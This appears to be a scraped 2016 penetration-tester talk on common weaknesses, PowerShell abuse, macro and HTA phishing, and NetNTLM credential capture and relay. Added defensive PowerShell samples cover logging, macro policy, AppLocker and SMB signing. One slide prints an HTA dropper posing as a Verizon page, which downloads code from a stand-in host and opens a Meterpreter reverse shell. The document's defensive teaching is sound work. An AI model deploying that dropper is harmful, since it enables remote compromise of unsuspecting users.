Published by Moris Miller. Modified over 8 years ago.
1
©2014 CliftonLarsonAllen LLP CLAconnect.com
Lessons Learned from a Penetration Tester
NASCUS 2016
2
Intro/Summary
I am going to share with you:
1. whoami
2. Common security issues
   ◊ External
   ◊ Internal
3. PowerShell Overview
4. Popular attack vectors
   ◊ Phishing
   ◊ Internal network
5. Key defensive strategies
3
whoami
David Anderson
Farm kid turned hacker dude
Worked in IT for 6 years
Penetration tester for 4+ years
Yes, I am older than 18
4
Common Issues
The same thing… over and over…
5
Common Issues from External Perspective
1. Poor email filtering
   a) Ability to spoof internal email addresses
   b) Ability to send malicious attachments
2. Not implementing two-factor authentication
   a) Outlook Web App
   b) VPN
3. Lack of filtering on perimeter
   a) Domain whitelisting
   b) Egress filtering
   c) SSL/TLS inspection
6
Common Issues from Internal Perspective
1. Giving users local admin privileges
2. Sharing passwords/weak passwords
   a) Local admin account
   b) IT admins
   c) Service accounts
3. Weak/no encryption
4. Poor patching
5. End users
   a) Can we patch these???
7
PowerShell
That’s one powerful shell…
8
PowerShell
Windows scripting environment built on .NET
Comes pre-installed
– Attackers don’t have to worry about AV
Able to perform many different tasks that the command prompt couldn’t
9
PowerShell
Search for systems where you have local administrator access
Search for where domain administrators are logged in
Can download items from a URL
Can inject malicious code straight into memory
10
How to protect yourself
Prevent standard users from executing PowerShell
– Free Microsoft tools – AppLocker & Software Restriction Policies (SRP)
Implement new PowerShell security features
– Script Transcription
– Script Block Logging
Microsoft EMET to protect memory
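As an added example (not from the deck or its author), the following PowerShell turns on the two logging features named above through the registry values the Group Policy templates write, then searches the resulting Event ID 4104 records for the command-line patterns that the HTA slide later in this deck shows. It assumes Windows PowerShell 5.0 or later, an elevated session, and a transcript directory path that is mine.

```powershell
# Added example: enable Script Block Logging and transcription, then audit 4104 events.
# Keys under HKLM:\SOFTWARE\Policies mirror the Group Policy settings under
# Administrative Templates > Windows Components > Windows PowerShell.
$PsPolicyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

function Enable-PSLogging {
    param([string]$TranscriptDir = 'C:\PSTranscripts')   # assumed path; use an ACL-protected share in production
    $sbl = Join-Path $PsPolicyRoot 'ScriptBlockLogging'
    $tr  = Join-Path $PsPolicyRoot 'Transcription'
    foreach ($key in $sbl, $tr) { New-Item -Path $key -Force | Out-Null }

    # Logs the de-obfuscated text of every script block to Microsoft-Windows-PowerShell/Operational (ID 4104)
    Set-ItemProperty -Path $sbl -Name EnableScriptBlockLogging -Type DWord -Value 1
    # Writes a full session transcript, with invocation headers, to the output directory
    Set-ItemProperty -Path $tr -Name EnableTranscripting    -Type DWord  -Value 1
    Set-ItemProperty -Path $tr -Name EnableInvocationHeader -Type DWord  -Value 1
    Set-ItemProperty -Path $tr -Name OutputDirectory        -Type String -Value $TranscriptDir
}

# Indicators taken from the HTA dropper shown in this deck: execution-policy bypass,
# hidden window, download-and-invoke, in-memory shellcode injection.
$SuspiciousPatterns = '-exec bypass', '-win hidden', 'DownloadString', 'Invoke-Shellcode', 'FromBase64String'

function Find-SuspiciousScriptBlocks {
    param([int]$MaxEvents = 1000)
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            $text = [string]$_.Properties[2].Value   # property 2 of a 4104 event is ScriptBlockText
            $hits = $SuspiciousPatterns | Where-Object { $text -match [regex]::Escape($_) }
            if ($hits) {
                [pscustomobject]@{
                    Time    = $_.TimeCreated
                    User    = $_.UserId
                    Matched = $hits -join ', '
                    Snippet = $text.Substring(0, [Math]::Min(120, $text.Length))
                }
            }
        }
}

Enable-PSLogging
# Note: once logging is on, this script's own block contains the indicator strings and will
# itself appear in the results; tune the search (e.g. exclude the script path) in production.
Find-SuspiciousScriptBlocks | Format-Table -AutoSize
```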
11
Phishing Vectors
Same ol’ tricks…
12
Office Macros
Macros allow attackers to access any applications/features that are installed or available on the user’s workstation
Utilizing PowerShell, attackers can execute malicious code easily
13
Office Macros
14
Office Macros
15
Office Macros
How to protect yourself…
Use Group Policy to disable macros
– Office 2016 has new security features
Teach users who utilize macros the dangers of opening unknown documents
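As an added example (not from the deck), this PowerShell audits and sets the Office 2016 macro policy values that the Group Policy templates write, including the Office 2016 control that blocks macros in files downloaded from the Internet. It sets the values locally under HKCU for demonstration; in a domain the same values are deployed through a user GPO.

```powershell
# Added example: audit and set the Office 2016 (16.0) macro policy values written by Group Policy.
# VBAWarnings 4 = disable all macros without notification; 3 = disable except digitally signed
# (use 3 where some users legitimately need signed macros).
# blockcontentexecutionfrominternet = 1 blocks macros in files that carry the Mark-of-the-Web
# (downloads, e-mail attachments) regardless of the VBAWarnings setting.
$OfficeApps = 'Word', 'Excel', 'PowerPoint'

function Get-MacroPolicy {
    foreach ($app in $OfficeApps) {
        $key = "HKCU:\Software\Policies\Microsoft\Office\16.0\$app\Security"
        $cur = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
        [pscustomobject]@{
            App                  = $app
            VBAWarnings          = $cur.VBAWarnings                        # $null = not managed by policy
            BlockInternetContent = $cur.blockcontentexecutionfrominternet
            Compliant            = ($cur.VBAWarnings -in @(3, 4)) -and
                                   ($cur.blockcontentexecutionfrominternet -eq 1)
        }
    }
}

function Set-MacroPolicy {
    param([ValidateSet(3, 4)][int]$VBAWarnings = 4)
    foreach ($app in $OfficeApps) {
        $key = "HKCU:\Software\Policies\Microsoft\Office\16.0\$app\Security"
        New-Item -Path $key -Force | Out-Null
        Set-ItemProperty -Path $key -Name VBAWarnings -Type DWord -Value $VBAWarnings
        Set-ItemProperty -Path $key -Name blockcontentexecutionfrominternet -Type DWord -Value 1
    }
}

Get-MacroPolicy | Format-Table -AutoSize   # before: typically nothing managed, Compliant = False
Set-MacroPolicy -VBAWarnings 3
Get-MacroPolicy | Format-Table -AutoSize   # after: Compliant = True for each application
```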
16
Office Macros
17
.HTA Payloads
HTA = HTML Application
Allows attacker to run malicious applications on end user’s system
Needs to be opened with Internet Explorer
.HTA files get launched by a trusted Microsoft application - mshta.exe
18
.HTA Payloads
19
.HTA Payloads
From Microsoft: “HTAs not only support everything a webpage … but also HTA-specific functionality. This added functionality provides control over user interface design and access to the client system. Moreover, run as trusted applications, HTAs are not subject to the same security constraints as webpages. The end result is that an HTA runs like any executable (.exe) file written in C++ or Visual Basic.”
20
.HTA Payloads
Verizon Account Management

Sub Initialize()
    Dim sCmd, iResult, sResultData, sMessage
    window.resizeTo 375,250

    'Set command to call PowerShell script
    'sCmd = "powershell.exe -nop -exec bypass -win hidden -command iex(New-Object Net.WebClient).DownloadString('https://hack.net/is');Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost 11.22.33.44 -lport 443 -force"
    sCmd = "powershell.exe -nop -noni -exec bypass -win hidden -command iex(New-Object Net.WebClient).DownloadString('https://hack.net/is'); Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost 11.22.33.44 -lport 443 -force"

    'Call PowerShell script
    Set oShell = CreateObject("Wscript.Shell")
    iResult = oShell.Run(sCmd, 0, true)

    'Collect result from PowerShell (via clipboard)
    sResultData = window.clipboarddata.getdata("Text")
End Sub
21
.HTA Payloads
22
.HTA Payloads
23
.HTA Payloads
How to protect yourself…
Block mshta.exe from running on systems
Web filter/content filter – block .hta extension
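The two AppLocker recommendations in this deck, keeping PowerShell away from standard users (PowerShell defence slide) and blocking mshta.exe outright (this slide), expressed as one executable-rule policy. This is an added example, not from the deck; the rule names, the scratch file path and the choice to start in AuditOnly mode are mine. It assumes an Enterprise or Server SKU with the Application Identity service running.

```powershell
# Added example: AppLocker Exe rules. Deny beats Allow in AppLocker, so mshta.exe is blocked
# for everyone (administrators included); PowerShell is simply not allowed for Everyone while
# the Administrators group (S-1-5-32-544) keeps its allow-all rule.
function New-PathRule {
    param($Name, $Sid, $Action, $Path, [string[]]$Except = @())
    $conds = "<Conditions><FilePathCondition Path=`"$Path`" /></Conditions>"
    $exc = ''
    if ($Except) {
        $exc = '<Exceptions>' + (($Except | ForEach-Object { "<FilePathCondition Path=`"$_`" />" }) -join '') + '</Exceptions>'
    }
    "<FilePathRule Id=`"$([guid]::NewGuid())`" Name=`"$Name`" Description=`"`" UserOrGroupSid=`"$Sid`" Action=`"$Action`">$conds$exc</FilePathRule>"
}

$rules = @(
    New-PathRule 'Admins: allow everything'       'S-1-5-32-544' Allow '*'
    New-PathRule 'Everyone: Program Files'        'S-1-1-0'      Allow '%PROGRAMFILES%\*'
    New-PathRule 'Everyone: Windows, no PowerShell' 'S-1-1-0'    Allow '%WINDIR%\*' -Except `
        '%WINDIR%\System32\WindowsPowerShell\v1.0\powershell*.exe',
        '%WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell*.exe'
    New-PathRule 'Everyone: deny mshta (64-bit)'  'S-1-1-0'      Deny  '%WINDIR%\System32\mshta.exe'
    New-PathRule 'Everyone: deny mshta (32-bit)'  'S-1-1-0'      Deny  '%WINDIR%\SysWOW64\mshta.exe'
)
# AuditOnly writes event 8003 to "AppLocker > EXE and DLL" instead of blocking; flip to "Enabled" after review.
$policyXml = "<AppLockerPolicy Version=`"1`"><RuleCollection Type=`"Exe`" EnforcementMode=`"AuditOnly`">$($rules -join '')</RuleCollection></AppLockerPolicy>"

$xmlPath = Join-Path $env:TEMP 'applocker-hardening.xml'   # assumed scratch location
Set-Content -Path $xmlPath -Value $policyXml -Encoding UTF8

# Dry-run the policy against the two binaries the deck names, as Everyone and as the current account.
$targets = "$env:windir\System32\mshta.exe", "$env:windir\System32\WindowsPowerShell\v1.0\powershell.exe"
foreach ($user in 'Everyone', "$env:USERDOMAIN\$env:USERNAME") {
    Test-AppLockerPolicy -XmlPolicy $xmlPath -Path $targets -User $user |
        Select-Object @{ n = 'User'; e = { $user } }, FilePath, PolicyDecision, MatchingRule
}

# Apply to the local machine; in a domain, import the same XML into a GPO instead.
Set-AppLockerPolicy -XmlPolicy $xmlPath
```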
24
Internal Vectors
Please give me your password…
25
Gathering network creds
Attacks Windows Single Sign-On
Starts by spoofing UDP traffic
– NetBIOS traffic
– LLMNR traffic
Tricks the computer into attempting to authenticate to the attacker
The computer automatically sends encrypted credentials to the attacker
26
Gathering network creds
Metasploit has modules to perform this attack
Attempt to crack weak passwords
How we gain initial foothold on the network 95% of the time
27
Gathering network creds
SMB Capture in Metasploit
Using John the Ripper to crack the password
28
Relaying network creds
Instead of capturing, we can relay
Can be used to authenticate to an alternate system or run malicious code on that system
The relayed user needs to have ADMIN privileges on the target host for code execution
29
Relay network creds
30
How to protect yourself
Enforce strong password requirements for ALL users
– We can crack an 8 character NTLM password in ~1 day
– We can crack an 8 character NetNTLMv2 password in ~11 days
Enforce SMB Signing
– This prevents man-in-the-middle attacks (stops relaying)
Restrict admin rights
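As an added example (not from the deck), this PowerShell checks and then enforces the SMB signing recommendation above on a single host, and goes one step beyond the slide's list by also switching off the two name-resolution protocols the capture slides say the attack starts with (LLMNR and NetBIOS over TCP/IP), so the host no longer answers poisoned name queries. It assumes an elevated session on Windows 8/Server 2012 or later, where the Smb* cmdlets exist; fleet-wide, the same settings belong in Group Policy.

```powershell
# Added example: measure and reduce this host's exposure to NetNTLM capture and relay.
$NbtInterfaces = 'HKLM:\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces'
$DnsClientPolicy = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient'

function Get-RelayExposure {
    $srv   = Get-SmbServerConfiguration
    $cli   = Get-SmbClientConfiguration
    $llmnr = (Get-ItemProperty -Path $DnsClientPolicy -ErrorAction SilentlyContinue).EnableMulticast
    $nbt   = Get-ChildItem -Path $NbtInterfaces | ForEach-Object { (Get-ItemProperty -Path $_.PSPath).NetbiosOptions }
    [pscustomobject]@{
        ServerRequiresSigning = $srv.RequireSecuritySignature   # relay to this host fails when True
        ClientRequiresSigning = $cli.RequireSecuritySignature   # this host refuses unsigned servers when True
        LlmnrDisabled         = ($llmnr -eq 0)                  # $null = policy unset, LLMNR still on
        NetBiosDisabledOnAll  = @($nbt | Where-Object { $_ -ne 2 }).Count -eq 0   # 2 = disabled per interface
    }
}

function Set-RelayHardening {
    # Same effect as the "Microsoft network server/client: Digitally sign communications (always)" policies
    Set-SmbServerConfiguration -RequireSecuritySignature $true -Force
    Set-SmbClientConfiguration -RequireSecuritySignature $true -Force
    # LLMNR: the "Turn off multicast name resolution" policy
    New-Item -Path $DnsClientPolicy -Force | Out-Null
    Set-ItemProperty -Path $DnsClientPolicy -Name EnableMulticast -Type DWord -Value 0
    # NetBIOS over TCP/IP is a per-interface setting: 0 = DHCP default, 1 = enabled, 2 = disabled
    Get-ChildItem -Path $NbtInterfaces |
        ForEach-Object { Set-ItemProperty -Path $_.PSPath -Name NetbiosOptions -Type DWord -Value 2 }
}

Get-RelayExposure        # before: typically all four fields False
Set-RelayHardening
Get-RelayExposure        # after: all four fields True
```

Signing has to be required on the hosts an attacker would relay to, not only on the victim's workstation, and legacy devices that cannot sign will lose access; keep "restrict admin rights" in place so a relayed user is not a local administrator on the target anyway.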
31
How to protect yourself
32
QUESTIONS
33
CLAconnect.com
twitter.com/CLAconnect
facebook.com/cliftonlarsonallen
linkedin.com/company/cliftonlarsonallen
Thank you!
David Anderson, OSCP
Manager, Information Security
Direct: 612-376-4699
Email: david.anderson@claconnect.com